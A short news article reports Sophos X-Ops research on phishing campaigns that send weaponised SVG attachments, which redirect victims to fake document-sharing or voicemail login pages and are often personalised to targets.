Sophos posts research on new SVG phishing cyberthreat

Sophos X-Ops, the threat research unit of Sophos, has posted research on a new phishing cyberthreat that is exploiting the Scalable Vector Graphics (SVG) file format.

According to Sophos, cybercriminals increasingly leverage SVG files—a graphics format containing XML-like text instructions—to evade anti-phishing and anti-spam protections.

The research, published recently, reveals that phishing gangs have adopted a technique of sending weaponised SVG files as email attachments since late last year. These files, when opened, redirect victims to malicious sites hosting phishing kits, posing significant risks to individuals and organisations alike, says Sophos.

As per the research by Sophos, this is how the attacks work: Cybercriminals send emails with SVG file attachments to their targets. The SVG file, when clicked, opens in the target's browser by default. The file contains embedded links or JavaScript that redirects the browser to a phishing site. Victims are presented with fake prompts, such as requests to open a document hosted on platforms like DocuSign, Dropbox, or SharePoint, or to listen to a voicemail message via Google Voice.

Sophos X-Ops says that it has also discovered that nearly half of the SVG files analysed were highly customised, with the target's email address or name embedded directly into the file. This level of personalisation suggests these attacks are being used for targeted campaigns against specific companies, says Sophos.